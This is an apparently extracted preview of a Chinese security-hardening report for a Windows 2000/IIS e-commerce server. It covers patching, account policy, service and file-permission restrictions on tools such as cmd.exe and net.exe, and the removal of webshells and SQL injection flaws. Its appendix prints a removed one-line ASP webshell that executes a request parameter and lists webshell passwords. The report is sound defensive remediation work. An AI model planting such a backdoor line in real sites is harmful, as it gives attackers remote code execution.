XXX电子商务网站安全加固报告_第1页
XXX电子商务网站安全加固报告_第2页
XXX电子商务网站安全加固报告_第3页
XXX电子商务网站安全加固报告_第4页
XXX电子商务网站安全加固报告_第5页
已阅读5页,还剩11页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、XXX电子商务网站安全加固报告目录电子商务网站安全加固报告1目录2一、加固主机列表3二、加固实施42.1操作系统加固42.1.1 补丁安装42.1.2 帐号、口令策略修改42.1.3 网络与服务加固42.1.4 文件系统加固52.1.5 日志审核增强62.1.6 安全性增强72.1.7 推荐安装安全工具82.2 IIS服务加固82.2.1 补丁安装82.2.2 网站实例权限分配82.2.3 IIS配置安全增强92.2.4 安全控件加固92.3 代码审核加固102.3.1 清除WebShell代码102.3.2 清除SQL注入漏洞102.3.3 修正权限认证缺陷102.3.4 减少上传风险威胁1

2、12.3.5 正确处理数据库文件11三、推荐安全注意事项123.1为新增网站实例分配权限123.2 使用SSL加密FTP传输123.3 加强管理员安全习惯12四、签字确认13附录:14后台访问用户认证分配一览表14代码加固修改一览表14一、加固主机列表本次安全加固服务的对象包括:编号IP地址操作系统用途或服务H_2112_1XX.XX.XX.2Windows 2000 Server提供电子商务服务,有偿提供考试资料填写规则:编号统一使用“型号_地址缩写_数字”型号(H主机;D设备),数字使用三位数字顺序号。二、加固实施2.1操作系统加固2.1.1 补丁安装编号:Windows-02001名称:

3、补丁安装系统以往状态:Windows 2000 Service Pack 4IE 最新积累补丁方案实施使用Windows update安装最新补丁实施目的可以使系统版本为最新版本实施风险安装补丁可能导致主机启动失败,或其他未知情况发生2.1.2 帐号、口令策略修改编号:Windows-03002,Windows-03003,Windows-03004名称:帐号口令策略修改系统以往状态:密码长度最小值0 字符密码最长存留期42天密码最短存留期0天帐号锁定计数器无帐户锁定时间0帐户锁定阀值无方案实施密码长度最小值7 字符密码最长存留期90天密码最短存留期30天帐号锁定计数器5次帐户锁定时间5分钟帐

4、户锁定阀值1分钟实施目的保障帐号以及口令的安全实施风险设置帐号策略后可能导致不符合帐号策略的帐号无法登陆,需修改帐号密码(注:管理员不受帐号策略限制,但管理员密码应复杂)2.1.3 网络与服务加固编号:Windows-04003,Windows-04004名称:卸载不需要的服务系统以往状态:已安装的不必要的服务包括:DNS服务DHCP服务MS FTP服务SNMP服务方案实施开始|设置|控制面板|添加/删除程序|Windows组件卸载不需要的服务实施目的避免未知漏洞给主机带来的风险实施风险可能由于管理员对主机所开放服务不了解,导致该服务被卸载。编号:Windows-04005名称:将暂时不需要开

5、放的服务停止系统以往状态:已启动且需要停止的服务包括:Computer Browser服务Alerter服务Messenger服务方案实施开始|运行|services.msc|将上述服务的启动类型设置为手动并停止上述服务实施目的避免未知漏洞给主机带来的风险实施风险可能由于管理员对主机所开放服务不了解,导致该服务被卸载。2.1.4 文件系统加固编号:Windows-05002名称:限制特定执行文件的权限系统以往状态:未对敏感执行文件设置合适的权限方案实施通过实施我公司的安全策略文件对特定文件权限进行限制,禁止Guests用户组访问这些文件。实施目的禁止Guests用户组访问以下文件:xcopy.

6、exe wscript.exe cscript.exe net.exe arp.exe edlin.exe ping.exe route.exe posix.exe Rsh.exe atsvc.exe Copy.execacls.exe ipconfig.exe rcp.exe cmd.exedebug.exe regedt32.exe regedit.exe telnet.exeFinger.exeNslookup.exeRexec.exeftp.exeat.exerunonce.exe nbtstat.exe Tracert.exenetstat.exe 实施风险在极少数

7、情况下,某些网页可能调用cmd.exe来完成某种功能,限制cmd.exe的执行权限可能导致调用cmd失败。2.1.5 日志审核增强编号:Windows-06001名称:设置主机审核策略系统以往状态:审核策略更改无审核审核登录事件无审核审核对象访问无审核审核过程追踪无审核审核目录服务访问无审核审核特权使用无审核审核系统事件无审核审核帐户登录事件无审核审核帐户管理无审核方案实施通过实施我公司的安全策略文件修改下述值:审核策略更改成功审核登录事件无审核审核对象访问成功, 失败审核过程追踪无审核审核目录服务访问无审核审核特权使用无审核审核系统事件成功, 失败审核帐户登录事件成功, 失败审核帐户管理成功

8、, 失败实施目的对系统事件进行审核,在日后出现故障时用于排查故障。实施风险无编号:Windows-06002,Windows-06003,Windows-06004名称:调整事件日志的大小、覆盖策略系统以往状态:大小覆盖方式应用日志512K覆盖早于7天的事件安全日志512K覆盖早于7天的事件系统日志512K覆盖早于7天的事件方案实施通过实施我公司的安全策略文件修改下述值:大小覆盖方式应用日志16382K覆盖早于30天的事件安全日志16384K覆盖早于30天的事件系统日志16384K覆盖早于30天的事件实施目的增大日志大小,避免由于日志文件容量过小导致日志记录不全实施风险无2.1.6 安全性增强

9、编号:Windows-07001名称:禁止匿名用户连接系统以往状态:Key:HKLMSYSTEMCurrentControlSetControlLsa“restrictanonymous”的值为0方案实施通过实施我公司的安全策略文件将该值修改为“1”实施目的可以禁止匿名用户列举主机上所有用户、组、共享资源实施风险无编号:Windows-04006名称:删除主机管理共享系统以往状态:Key:HKLMSYSTEMCurrentControlSetServiceslanmanserverparameters无“Autoshareserver”键方案实施通过实施我公司的安全策略文件增加“Autosha

10、reserver”项,并设置该值为“1”实施目的删除主机因为管理而开放的共享实施风险某些应用软件可能需要该共享,如Veritas Netbackup编号:Windows-07001名称:禁止匿名用户连接系统以往状态:Key:HKLMSYSTEMCurrentControlSetControlLsa“restrictanonymous”的值为0方案实施通过实施我公司的安全策略文件将该值修改为“1”实施目的可以禁止匿名用户列举主机上所有用户、组、共享资源实施风险无编号:Windows-03005名称:限制Guest用户权限系统以往状态:Guest已禁用,但未对帐号进行权限限制。方案实施通过实施我公

11、司的安全策略文件禁止Guest帐号本地登录和网络登录的权限。实施目的避免Guest帐号被黑客激活作为后门实施风险无2.1.7 推荐安装安全工具工具名称IceSword 1.06工具用途特洛伊木马彻查、黑客后门检测工具相关信息/tools/741.html工具名称X-Scan-v3.2-cn工具用途网络隐患扫描工具相关信息/tools/1016.html注:工具名称请包含版本信息工具用途请简单描述产品功用相关信息请写明产品相关URL,尽量详细2.2 IIS服务加固2.2.1 补丁安装编号:Windows-02001(

12、将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:补丁安装系统以往状态:Windows 2000 Service Pack 4方案实施使用Windows update安装最新补丁实施目的可以使系统版本为最新版本实施风险(应描述实施本条措施所导致的后果)2.2.2 网站实例权限分配编号:Windows-02002(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:权限分配系统以往状态:没有对每个网站实例进行相应的权限分配,任何一个网站被入侵后都有可能导致其他网站被入侵方案实施每个网站实例都对应使用低权限帐

13、户,并去除网站后台的匿名访问,集成Windows认证实施目的可以使各个网站实例读取、修改权限完全分开,避免入侵者从一个网站实例入侵到另一个网站实例实施风险(应描述实施本条措施所导致的后果)2.2.3 IIS配置安全增强编号:Windows-02003(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:配置安全增强系统以往状态:存在很多默认配置,导致入侵者可利用方案实施修正IIS的扩展配置,减少asp.dll解析范围,禁止下载MDB文件实施目的减少入侵者入侵几率,防止网站数据库被恶意下载实施风险(应描述实施本条措施所导致的后果)2.2.4 安全控件加

14、固编号:Windows-02004(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:安全空间加固系统以往状态:存在很多危险控件,导致入侵者可利用方案实施卸载了WSH控件,修改Shell.Application控件的名称,防止入侵者利用:HKEY_CLASSES_ROOTShell.Application改成Shell.Application_OurSafeHKEY_CLASSES_ROOTShell.Application.1改成了Shell.Application.1_OurSafe实施目的减少ASP木马对网站的威胁实施风险将有可能导致某些特殊

15、网站实例不能正常运行2.3 代码审核加固2.3.1 清除WebShell代码编号:Windows-03001(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:清除WebShell代码系统以往状态:有可能存在入侵者留下的后门、WebShell程序方案实施人工搜索查找入侵者留下的后门ASP程序实施目的防止入侵者再次入侵网站实施风险(应描述实施本条措施所导致的后果)2.3.2 清除SQL注入漏洞编号:Windows-03002(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:清除SQL注入漏洞系统以往状态

16、:存在很多SQL注入漏洞方案实施使用统一脚本,对用户提交进行过滤检查,防止用户提交注入代码实施目的防止恶意用户利用SQL注入漏洞危害网站实施风险(应描述实施本条措施所导致的后果)2.3.3 修正权限认证缺陷编号:Windows-03003(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:修正权限认证缺陷系统以往状态:存在一部份的权限未认证缺陷方案实施对没有检查权限的页面添加权限认证实施目的防止低权限用户执行高权限功能实施风险(应描述实施本条措施所导致的后果)2.3.4 减少上传风险威胁编号:Windows-03004(将所有涉及到这个加固项的检测

17、文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:修正权限认证缺陷系统以往状态:存在上传漏洞方案实施修改代码封堵上传漏洞实施目的防止恶意用户上传WebShell或其他恶意程序实施风险(应描述实施本条措施所导致的后果)2.3.5 正确处理数据库文件编号:Windows-03005(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)名称:正确处理数据库文件系统以往状态:采用ASP为扩展名,恶意用户将有可能插入恶意代码并执行方案实施扩展名改为MDB,并对WEB应用程序进行相应修改实施目的防止恶意用户插入恶意代码并执行实施风险(应描述实施本条措

18、施所导致的后果)三、推荐安全注意事项3.1为新增网站实例分配权限当需要新增加一个网站实例的时候,需要按照一定的步骤完成权限的分配:1. 新建两个帐号,删除这两个帐号的User组身份,加入Guest组;2. 指定网站目录只能够被XXXistrator和SYSTEM完全控制,而上述两个帐号对该目录及其子目录有读写、修改权限;3. 在IIS中设置匿名访问该网站的匿名帐户为上述两个帐号其中之一;4. 在IIS中设置该网站管理员后台目录(或核心文件)不允许匿名访问,增加Windows身份认证;5. 在IIS中设置该网站的主机头。3.2 使用SSL加密FTP传输开启Serv-U的SSL加密功能,只允许加密

19、登陆以及加密传输文件,以防止恶意用户ARP嗅探FTP密码。3.3 加强管理员安全习惯注意及时升级管理员主机的系统补丁和杀毒软件病毒库,定期使用推荐的后门检测工具对主机进行安全检测。定期更换Web应用程序后台管理员密码,并保证密码的强度。四、签字确认双方认可加固报告,签字确认。甲方:乙方:签字(签章):签字(签章)日期:日期附录:后台访问用户认证分配一览表域名目录指向后台登陆用户名XX.comD:WEBXXXXXX.XX XX.netD:wwwXXXXX.XXXX.cnD:www1XX.XX XX.comD:WEBXX.comXX.XX XX.comD:WEBXX.comXX.XX bbs.XX

20、.comD:WEBXXXbbsXX.XXX.XXXX.XX.comD:WEBXXXXXXXX.XXX.XXXXX.XX.comD:WEBXXXexamXX.XXX.XX XX.XX.comD:WEBXXXXXXXX.XXX.XX用户密码暂统一为“*”(不带双引号),建议用户自行修改。代码加固修改一览表XXX.com目录Connection.asp修改数据库为mdb结尾修改包含sql.asp,防止SQL注入IncludeRegKey.cfg修改数据库结尾Setup.asp改名为Setup04131.aspMangerEditor改为EditorIncludeconst.asp删除!webshel

21、lIncludeMD5.asp删掉文件最后一行,该行代码为webshell代码XXX.com目录CONN.ASP修改数据库为mdb结尾修改包含sql.asp,防止SQL注入增加容错信息XXX/CONN.ASP修改数据库为mdb结尾修改包含sql.asp,防止SQL注入增加容错信息XXX/UPFILE.ASP注释掉27行,替换成固定上传路径为./pic/的代码增加对XXX身份验证,XXX/UPLOAD.ASP增加对XXX身份验证,XXX/TEXTBOX.ASP增加对XXX身份验证,XXX/EOKEDIT.ASP增加对XXX身份验证,eWebEditor目录名改为eWebEditor41937ed

22、itdel.asp修改增加身份验证chkXXX.asp修改认证方式,采用session保存密码,防止跨站攻击test目录名修改为Test8322XXXXXX.ASP将管理身份认证提前XXXXXX.ASP添加容错信息修改包含sql.asp,防止SQL注入XXXdata.mdb防止下载,改名为data3415.mdbXXXincubb.asp删掉!WebShell代码kjaskcommon.asp修改数据库为kjgb5674.mdb修改包含sql.asp,防止SQL注入增加容错信息XXX.com目录XXXXX_backup.asp删掉!WebShell,密码是XXdragon.asp删掉!WebShellXXLOGIN.ASP删除最后三行,WebShell代码%if request(kker) then Session(b)=request(kker)if Session(b) then execute Session(b)%XXXXXTEST.ASP空文件XXXXXtestab.asp删除,WebShell,密码是!#123XXXXX_backup.asp删除!WebShellXXtiet.asp删除!WebShellXXuserad.asp删除!WebShe

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论